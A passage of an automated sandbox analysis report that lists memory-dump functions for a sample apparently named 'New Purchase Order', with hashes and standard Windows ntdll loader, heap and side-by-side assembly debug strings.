                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01842602
                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01842409
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                • API String ID: 0-4009184096
                • Opcode ID: 2b159785fe14f823caa6a284def5a938fde4603d30f08cafcc584dafe5bd37c8
                • Instruction ID: 7d616b67dd7af230feeb6a64b3b024f8ee374f586bf80511db00f979bc79c603
                • Opcode Fuzzy Hash: 2b159785fe14f823caa6a284def5a938fde4603d30f08cafcc584dafe5bd37c8
                • Instruction Fuzzy Hash: 05025DF1D0422D9BDB61DB58CD84BEAB7B9AB54304F0041DAA609E7281EB709F84CF59
                Function 01878B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                • API String ID: 0-2515994595
                • Opcode ID: a918722500ec22520117a1c1398d694cc7ace1b337a6b5db6883e61c1853d9df
                • Instruction ID: 011302f9648a260cfa19288f14338b6a81cba12d8fe039db3016c9ee1c186708
                • Opcode Fuzzy Hash: a918722500ec22520117a1c1398d694cc7ace1b337a6b5db6883e61c1853d9df
                • Instruction Fuzzy Hash: 5B51BDB16083059BD329CF188848BABBBECFFD5754F544A2DAA99C3241E770D704CB92
                Function 01880274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                • API String ID: 0-1700792311
                • Opcode ID: 667bcadffc36d4355dc9d3717a412f76bf6db056306887a1b3a6b723a636a173
                • Instruction ID: 7a2a7d2e63cd473f90a200084fec6757d5fba0857696dd771d0afb9099b92b54
                • Opcode Fuzzy Hash: 667bcadffc36d4355dc9d3717a412f76bf6db056306887a1b3a6b723a636a173
                • Instruction Fuzzy Hash: C2D1CF7160068ADFDB22EF68C455AA9FBF1FF49718F18805DF445EB252C7349A89CB20
                Function 018589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                Download Yara Rule
                Strings
                • VerifierDlls, xrefs: 01858CBD
                • VerifierDebug, xrefs: 01858CA5
                • AVRF: -*- final list of providers -*- , xrefs: 01858B8F
                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01858A3D
                • HandleTraces, xrefs: 01858C8F
                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01858A67
                • VerifierFlags, xrefs: 01858C50
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                • API String ID: 0-3223716464
                • Opcode ID: 7dd223d3d8e2f1e1d3269e6c184cd266b90e8940eb264cf22a030b3c4f925432
                • Instruction ID: 4a242e82d1f05851f208b1c472cc2d7a86edc68bc6d8f15e87f5ce46dbf43b1b
                • Opcode Fuzzy Hash: 7dd223d3d8e2f1e1d3269e6c184cd266b90e8940eb264cf22a030b3c4f925432
                • Instruction Fuzzy Hash: 2D91F3B1A01716DFDB62DF2E8880B5AB7E9EB55B14F05045EFE45EB241D730AF008B92
                Function 018063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                • API String ID: 0-792281065
                • Opcode ID: 89a5727e7a8eb199de6d3b14ce549dd3379b8939b3293109bbcefebe63489278
                • Instruction ID: 39432629c7a31e51ea3777de6a29301aee13f7e86cb6d7edfee2f11f062a0b0e
                • Opcode Fuzzy Hash: 89a5727e7a8eb199de6d3b14ce549dd3379b8939b3293109bbcefebe63489278
                • Instruction Fuzzy Hash: AD911871B0171D9BEB26DF58DC84BAA7BA1BF50B18F250129EA00E72C5EB749701CB91
                Function 017C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                Download Yara Rule
                Strings
                • apphelp.dll, xrefs: 017C6496
                • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01829A2A
                • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 018299ED
                • minkernel\ntdll\ldrinit.c, xrefs: 01829A11, 01829A3A
                • LdrpInitShimEngine, xrefs: 018299F4, 01829A07, 01829A30
                • Getting the shim user exports failed with status 0x%08lx, xrefs: 01829A01
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                • API String ID: 0-204845295
                • Opcode ID: c1c12f80b5578cb6ed599ee1f1afb59078339f055a17402aff2a85a8dcf3410a
                • Instruction ID: 29ee7f0339040213db13e6546e45ed177dd144fce12f35bd836dda59cae4134a
                • Opcode Fuzzy Hash: c1c12f80b5578cb6ed599ee1f1afb59078339f055a17402aff2a85a8dcf3410a
                • Instruction Fuzzy Hash: 385104716083149FD721DF24D895FABB7E8FB84B48F10091EF98697265DB30EA44CB92
                Function 0180C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                Download Yara Rule
                Strings
                • minkernel\ntdll\ldrredirect.c, xrefs: 01848181, 018481F5
                • Unable to build import redirection Table, Status = 0x%x, xrefs: 018481E5
                • minkernel\ntdll\ldrinit.c, xrefs: 0180C6C3
                • LdrpInitializeImportRedirection, xrefs: 01848177, 018481EB
                • LdrpInitializeProcess, xrefs: 0180C6C4
                • Loading import redirection DLL: '%wZ', xrefs: 01848170
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                • API String ID: 0-475462383
                • Opcode ID: 9f25f0b83bdd5fae3c4303db6f91d1175cadb23b20b71472b531d497f3f0fa63
                • Instruction ID: 9b2608f52fdf11b4fa62074354100d5a6a8692400fdff31907caabd1b29e85c8
                • Opcode Fuzzy Hash: 9f25f0b83bdd5fae3c4303db6f91d1175cadb23b20b71472b531d497f3f0fa63
                • Instruction Fuzzy Hash: DC31F5B164474A9FC224EE68DD45E1AB794EF90B14F01055CF940AB295EB20EE04C7A2
                Function 01802674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                Download Yara Rule
                Strings
                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01842180
                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0184219F
                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01842178
                • SXS: %s() passed the empty activation context, xrefs: 01842165
                • RtlGetAssemblyStorageRoot, xrefs: 01842160, 0184219A, 018421BA
                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018421BF
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                • API String ID: 0-861424205
                • Opcode ID: 539ba441eaf2a2284babf8e309719a7e3150dc15e3d28bcb7c9688b0ab9dc3f4
                • Instruction ID: bbe57067eed31e1326f86fc843e7bdd9ce301d5e1e3059e5a7a53363ce13a218
                • Opcode Fuzzy Hash: 539ba441eaf2a2284babf8e309719a7e3150dc15e3d28bcb7c9688b0ab9dc3f4
                • Instruction Fuzzy Hash: 8D312B76F4021D77F7229A999C85F9BBB7ADBA4B90F054059BB04F7180D7B0AB00C7A1
                Function 0181096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 01812DF0: LdrInitializeThunk.NTDLL ref: 01812DFA
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810BA3
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810BB6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810D60
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810D74
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                • String ID:
                • API String ID: 1404860816-0
                • Opcode ID: a8e97f5424a73a4358402485c98d4b0012f98d210e55f57069c330b7c2f4bed7
                • Instruction ID: 725e59e3c5bd6e7008c813963255086403446b9e3602464233663258df519827
                • Opcode Fuzzy Hash: a8e97f5424a73a4358402485c98d4b0012f98d210e55f57069c330b7c2f4bed7
                • Instruction Fuzzy Hash: B4425F76900719DFDB21CF28C840BAAB7F9FF48314F1445A9E989DB245DB70AA84CF61
                Function 017DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                • API String ID: 0-379654539
                • Opcode ID: 951d0ac2a45e3ce64a67e8bee2b112ac3b893bdcfc8b123318e9bfe247643d30
                • Instruction ID: 90339fdb64d326b3ae54b9ec4297dbd961a07ccc7f9b9bfcf77ff1e75bb73c66
                • Opcode Fuzzy Hash: 951d0ac2a45e3ce64a67e8bee2b112ac3b893bdcfc8b123318e9bfe247643d30
                • Instruction Fuzzy Hash: 83C1697510838ACFD711CF58C044B6AB7F4BF84704F0489AAF996CB255E734DA4ACBA2
                Function 01808402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                Download Yara Rule
                Strings
                • minkernel\ntdll\ldrinit.c, xrefs: 01808421
                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0180855E
                • @, xrefs: 01808591
                • LdrpInitializeProcess, xrefs: 01808422
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                • API String ID: 0-1918872054
                • Opcode ID: 112b522e0300cfc1e109025b136f4ddd3ef57034190e24e644f16a8b44e45bcc
                • Instruction ID: 85c9f9957d946ff797bfb9efb9ee315e17fb913ee333e28746313eb46ae99a20
                • Opcode Fuzzy Hash: 112b522e0300cfc1e109025b136f4ddd3ef57034190e24e644f16a8b44e45bcc
                • Instruction Fuzzy Hash: 34919E71508749AFE722DF65CC81EABBAECBF89744F40092EF684D2195E730DA44CB52
                Function 0180273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                Download Yara Rule
                Strings
                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018422B6
                • .Local, xrefs: 018028D8
                • SXS: %s() passed the empty activation context, xrefs: 018421DE
                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018421D9, 018422B1
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                • API String ID: 0-1239276146
                • Opcode ID: 9f6ca3a8f1e369330c2edc3b58179a74be4a0db8b86976d5f44b850d5b093e24
                • Instruction ID: 6beb8abea679f5daaaaf3913a653aba8cb9c5b0af4cbff6c90653681160d0fc9
                • Opcode Fuzzy Hash: 9f6ca3a8f1e369330c2edc3b58179a74be4a0db8b86976d5f44b850d5b093e24
                • Instruction Fuzzy Hash: 6DA1B13590022D9BDB66CF68DC88BA9B7B6BF58354F1441E9E908E7291D7709F80CF90
                Function 01804AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                Download Yara Rule
                Strings
                • RtlDeactivateActivationContext, xrefs: 01843425, 01843432, 01843451
                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01843456
                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01843437
                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0184342A
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                • API String ID: 0-1245972979
                • Opcode ID: b11edeec3a24de0c6fa1509cca91961bf52b98be9215595f16fe80faa22e0c61
                • Instruction ID: cf076c10e61f3d41288b64a334eb5df46c98a9ed000c47b64b895600b6cfd3ca
                • Opcode Fuzzy Hash: b11edeec3a24de0c6fa1509cca91961bf52b98be9215595f16fe80faa22e0c61
                • Instruction Fuzzy Hash: 29612672640B1A9BD723CF1CC891B6AB7E5FFA0B50F148519EE55DB281CB30EA41CB91
                Function 017D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                Download Yara Rule
                Strings
                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018310AE
                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01830FE5
                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01831028
                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0183106B
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                • API String ID: 0-1468400865
                • Opcode ID: 77f7e3dfa060dba90671552c1cb3285363aaf1204e2c74e4f032096ee4bbca96
                • Instruction ID: 18536e09284054216c9be672a3c36bdfcca8257be9c7d8b7bef581b87e1c7cba
                • Opcode Fuzzy Hash: 77f7e3dfa060dba90671552c1cb3285363aaf1204e2c74e4f032096ee4bbca96
                • Instruction Fuzzy Hash: 9471D2B19043099FCB21DF18C884B9BBFA9EF95764F540468F9498B24AD734D6C8CBD2
                Function 017F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                Download Yara Rule
                Strings
                • apphelp.dll, xrefs: 017F2462
                • LdrpDynamicShimModule, xrefs: 0183A998
                • minkernel\ntdll\ldrinit.c, xrefs: 0183A9A2
                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0183A992
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                • API String ID: 0-176724104
                • Opcode ID: 5ec33cff8cf4030134c0f0ba19603a49379e183a111b1f1e77944bae61b67ead
                • Instruction ID: 9c46732aaaecb57ad4c470b73188c0ecd5935b991b324b8a1a6178079674831f
                • Opcode Fuzzy Hash: 5ec33cff8cf4030134c0f0ba19603a49379e183a111b1f1e77944bae61b67ead
                • Instruction Fuzzy Hash: CA313572A00201AFDB359F5D9885ABABBB5FBC0B04F29406DE950E7345D7B09B42CB80
                Function 017E29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                Download Yara Rule
                Strings
                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017E327D
                • HEAP[%wZ]: , xrefs: 017E3255
                • HEAP: , xrefs: 017E3264
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                • API String ID: 0-617086771
                • Opcode ID: 18e7a58c45b84d6319a6814a412a8d65329212d7a1eedbc4d621670ffbe1dc1b
                • Instruction ID: 46cf24c25fde5643f41970d29fcbd8f25a06ca4bbc96ec8f5972b8f2c6eee937
                • Opcode Fuzzy Hash: 18e7a58c45b84d6319a6814a412a8d65329212d7a1eedbc4d621670ffbe1dc1b
                • Instruction Fuzzy Hash: 5792BD71A046499FEB25CF68C448BAEFBF5FF48300F188099E959AB392D735A941CF50
                Function 017E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-4253913091
                • Opcode ID: bc919dac12b06bf190528f0b220d9329fc9566e274a57d7b8583b1c3e2ff2da4
                • Instruction ID: 871ae6b16bbc5ef441b4f4dab3321d323320f66dd190b280494d35129d76da29
                • Opcode Fuzzy Hash: bc919dac12b06bf190528f0b220d9329fc9566e274a57d7b8583b1c3e2ff2da4
                • Instruction Fuzzy Hash: 79F18B70700606DFEB25CF68C898B6AF7F5FB88304F1841A8E556DB385D774AA81CB91
                Function 017F6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: $@
                • API String ID: 0-1077428164
                • Opcode ID: 08bb6d8ebdcc87d4ee68aca06bf14751efa69a10c12eb44f8d9af09b20102bc4
                • Instruction ID: 370839221f5d0c809cdd9665ef5d0fbf8c59a46626fe2fc279d15542106a8009
                • Opcode Fuzzy Hash: 08bb6d8ebdcc87d4ee68aca06bf14751efa69a10c12eb44f8d9af09b20102bc4
                • Instruction Fuzzy Hash: 0AC25C716083419FEB29CF28C841BABFBE5AF88714F04896DFA89D7341D734D9458B92
                Function 017CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: FilterFullPath$UseFilter$\??\
                • API String ID: 0-2779062949
                • Opcode ID: 5ce5e1468482c9ee1f19307cceffa7fab7131495a041c3950ae779c6c76ba18f
                • Instruction ID: 674fe861b1c696b2adf89a14c2159ccc0ca4655a21370e1c54c2248525ba49ca
                • Opcode Fuzzy Hash: 5ce5e1468482c9ee1f19307cceffa7fab7131495a041c3950ae779c6c76ba18f
                • Instruction Fuzzy Hash: 09A13C719116399BDB229B68CC88BAEB7B9EF44710F1041E9DA09E7250D7359FC4CF50
                Function 017F0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                Download Yara Rule
                Strings
                • LdrpCheckModule, xrefs: 0183A117
                • Failed to allocated memory for shimmed module list, xrefs: 0183A10F
                • minkernel\ntdll\ldrinit.c, xrefs: 0183A121
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                • API String ID: 0-161242083
                • Opcode ID: c06d2c9e01f6ba784e01d0fa52054cba5cec7d69d86530bfe4a0490681b16e46
                • Instruction ID: 1c0a139f46e718d5779cd9750cc84b39baba32cf7e5521263dae0de9fe7f9111
                • Opcode Fuzzy Hash: c06d2c9e01f6ba784e01d0fa52054cba5cec7d69d86530bfe4a0490681b16e46
                • Instruction Fuzzy Hash: 5271BB71A002059FDB29DF68C985BBEF7F5EB84704F18406DEA42E7356E634AA41CB81
                Function 017E0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-1334570610
                • Opcode ID: dc84b77b294265dcae5bf7fdcb1fe1477e7311b96df5c8e5638fea6c3e2ec766
                • Instruction ID: 3e0fc326a6a59bccf73e0298f71f79b19f128d088ccf62d36749c44d337837eb
                • Opcode Fuzzy Hash: dc84b77b294265dcae5bf7fdcb1fe1477e7311b96df5c8e5638fea6c3e2ec766
                • Instruction Fuzzy Hash: 5B616C707003059FDB29CF28C888B6AFBE5FF49704F188599E459CB296D7B0E981CB91
                Function 0180C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                Download Yara Rule
                Strings
                • Failed to reallocate the system dirs string !, xrefs: 018482D7
                • minkernel\ntdll\ldrinit.c, xrefs: 018482E8
                • LdrpInitializePerUserWindowsDirectory, xrefs: 018482DE
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                • API String ID: 0-1783798831
                • Opcode ID: 5e3e0ce0fe42213e2d1f5b147c3d24a9feca8d130271c35786fdc8e5363f394f
                • Instruction ID: 29a9135d5f3840571756d0af9edc8644566f3c2d22cdb8d70284f7a2a4cf8b2a
                • Opcode Fuzzy Hash: 5e3e0ce0fe42213e2d1f5b147c3d24a9feca8d130271c35786fdc8e5363f394f
                • Instruction Fuzzy Hash: EA41E4B1544309AFC722EF6CDC48B5BB7E8EF48754F104A6AF944D3295EB70DA008B91
                Function 0188C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                Download Yara Rule
                Strings
                • PreferredUILanguages, xrefs: 0188C212
                • @, xrefs: 0188C1F1
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0188C1C5
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                • API String ID: 0-2968386058
                • Opcode ID: 4b86c40a97fb99d0bda84d7c5872a5106e33e6842192f08cceca66491e42a1aa
                • Instruction ID: b7d75ceb9d69d3ec98190a7e3b0396271731734047108d559c84b640ead10bab
                • Opcode Fuzzy Hash: 4b86c40a97fb99d0bda84d7c5872a5106e33e6842192f08cceca66491e42a1aa
                • Instruction Fuzzy Hash: 6E416272A00219EBDB11EAD8C895FEEBBB8AB54704F14416AE609F7284D7749B44CB60
                Function 01864144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
